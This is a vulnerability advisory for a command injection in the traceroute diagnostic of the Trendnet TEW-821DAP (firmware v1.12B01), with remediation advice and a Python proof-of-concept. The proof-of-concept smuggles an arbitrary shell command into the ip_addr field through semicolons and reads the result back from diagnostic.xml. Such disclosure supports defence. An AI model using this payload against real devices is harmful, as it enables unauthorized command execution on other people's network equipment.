# Trendnet TEW-821DAP Command Injection Vulnerability During Firmware Update Process ## Vulnerability Overview During the firmware update process, the `tools_diagnostic` function of Trendnet TEW-821DAP contains a command injection vulnerability. This function performs network diagnostics based on traceroute and saves the results to `/tmp/diagnostic`. The IP address is stored in variable `s` and used as an argument for the traceroute command. The IP address is provided by user input, and the web page validates it via an AJAX POST request using regular expressions. However, the validation does not check for shell metacharacters (such as `;` and `&`), allowing an attacker to inject malicious commands into the IP address. ## Impact Scope - **Affected Product**: TEW-821DAP (firmware version v1.12B01) ## Remediation - Implement stricter validation of IP address input to ensure it does not contain shell metacharacters. - Use parameterized queries or a whitelist mechanism to prevent command injection. ## POC Code ```python def vuln02_traceroute_cmd(self, cmd): print(f"[*] Vul #2: Traceroute command injection") print(f"[*] malicious command: {cmd}") payload = f'127.0.0.1; /dev/null;{cmd};' params = { "method": "1", "ip_addr": payload, "pkt_size": "56", "cnt": "4" } resp = self._post_apply("tools_diagnostic", params) print(f"[*] HTTP response code: {resp.status_code}") time.sleep(3) try: result_resp = self.session.get(f"{self.base_url}/diagnostic.xml") if result_resp.status_code == 200: print(f"[*] result:") print(result_resp.text) except Exception: pass return resp ```